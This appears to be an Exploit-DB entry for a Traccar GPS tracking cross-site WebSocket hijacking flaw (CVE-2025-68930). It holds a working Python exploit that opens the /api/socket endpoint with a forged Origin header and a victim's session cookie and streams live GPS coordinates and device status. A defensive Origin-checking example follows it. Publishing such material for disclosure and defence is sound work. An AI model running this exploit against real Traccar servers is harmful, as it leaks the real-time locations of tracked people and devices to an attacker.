EXPLOITDB

Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH) (EDB-ID:52545)

CVSS: 7.1 / 10 (HIGH)
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N


Basic Information

ID EDB-ID:52545
Published May 4, 2026 at 00:00

Affected Product

Affected Versions: <= 6.11.1

# Exploit Title: Traccar GPS Tracking System 6.11.1 - Cross-Site WebSocket Hijacking (CSWSH)
# Date: 2026-02-26
# Exploit Author: Hazar Taspinar
# Vendor Homepage: https://www.traccar.org/
# Software Link: https://github.com/traccar/traccar
# Version: <= 6.11.1
# Tested on: Windows 11 / Linux
# CVE: CVE-2025-68930

"""
Description:
Traccar fails to validate the 'Origin' header in WebSocket connections (/api/socket).
An attacker can bypass the Same Origin Policy (SOP) by supplying a malicious Origin header
along with a victim's valid JSESSIONID. This allows the attacker to hijack the
WebSocket connection and leak real-time sensitive data, including GPS coordinates
and device status.

Requirements:
pip install websocket-client
"""

import websocket
import argparse
import sys

def on_message(ws, message):
    print(f"[+] DATA LEAKED: {message}")

def on_error(ws, error):
    print(f"[-] Error: {error}")

def on_close(ws, close_status_code, close_msg):
    print("[-] Connection closed.")

def on_open(ws):
    print("[*] WebSocket Handshake Successful!")
    print("[*] Connection upgraded. Streaming real-time sensitive data...\n")

def main():
    parser = argparse.ArgumentParser(description="Traccar CSWSH Exploit - Information Disclosure")
    parser.add_argument("--target", required=True, help="Target IP address (e.g., 192.168.1.5)")
    parser.add_argument("--port", default="8082", help="Target Port (default: 8082)")
    parser.add_argument("--cookie", required=True, help="Valid JSESSIONID (e.g., node0xxxxxxx)")

    args = parser.parse_args()

    # Construct the WebSocket URL
    url = f"ws://{args.target}:{args.port}/api/socket"

    # Malicious headers triggering the bypass
    # The 'Origin' header is set to an external domain to demonstrate lack of validation.
    headers = [
        "Origin: http://hacker.com",
        f"Cookie: JSESSIONID={args.cookie}"
    ]

    print(f"""
================================================
TRACCAR GPS TRACKER - CSWSH EXPLOIT
Exploit Author: Hazar Taspinar
CVE: CVE-2025-68930
Target: {url}
================================================
""")

    # Initiate WebSocket connection
    ws = websocket.WebSocketApp(url,
                                on_message=on_message,
                                on_error=on_error,
                                on_close=on_close,
                                on_open=on_open,
                                header=headers)

    try:
        ws.run_forever()
    except KeyboardInterrupt:
        print("\n[*] Exploit stopped by user.")
        sys.exit(0)

if __name__ == "__main__":
    main()
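The defence the advisory points at is validating the Origin header on the upgrade request before the socket is accepted. The Python below is an added example written for this page (not Traccar's code and not part of the original exploit): an exact-match Origin check against the server's own origin plus an allowlist, exercised on constructed handshake headers; the host names, the cookie value and the `allowed_origins` setting are assumptions.

```python
from urllib.parse import urlsplit


def parse_origin(value):
    """Normalise an origin URL to (scheme, host, port); None if malformed or not http(s)."""
    try:
        parts = urlsplit(value.strip())
        if parts.scheme not in ("http", "https") or not parts.hostname:
            return None
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:  # e.g. a non-numeric port such as "8082.attacker.example"
        return None
    return (parts.scheme, parts.hostname.lower(), port)


def origin_allowed(headers, allowed_origins=(), tls=False):
    """Return True if a WebSocket upgrade request may be accepted.

    headers: request headers as a dict (names compared case-insensitively).
    allowed_origins: extra full origins allowed to open sockets (hypothetical setting).
    tls: whether this listener is served over https; used to build the server's own origin.
    """
    h = {k.lower(): v for k, v in headers.items()}
    origin = h.get("origin")
    if origin is None:
        # Browsers always send Origin on a WebSocket upgrade, so a request without one
        # was not issued by a cross-site page. Non-browser clients can forge any Origin;
        # this check only defends against the browser-driven attack.
        return True
    requested = parse_origin(origin)
    if requested is None:  # covers the literal "null" origin and garbage values
        return False
    host = h.get("host")
    if not host:
        return False
    own = parse_origin(("https://" if tls else "http://") + host)
    allowed = {own} | {parse_origin(o) for o in allowed_origins}
    allowed.discard(None)
    # Exact (scheme, host, port) comparison: a substring or prefix match would accept
    # "http://192.168.1.5:8082.attacker.example" or "http://attacker.example/192.168.1.5".
    return requested in allowed


if __name__ == "__main__":
    # Constructed handshake headers mirroring the PoC: a forged Origin with a valid session cookie.
    hijack = {"Host": "192.168.1.5:8082", "Origin": "http://hacker.com",
              "Cookie": "JSESSIONID=node0example"}
    same_site = {"Host": "192.168.1.5:8082", "Origin": "http://192.168.1.5:8082"}
    print("cross-site upgrade accepted:", origin_allowed(hijack))      # False
    print("same-origin upgrade accepted:", origin_allowed(same_site))  # True
```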
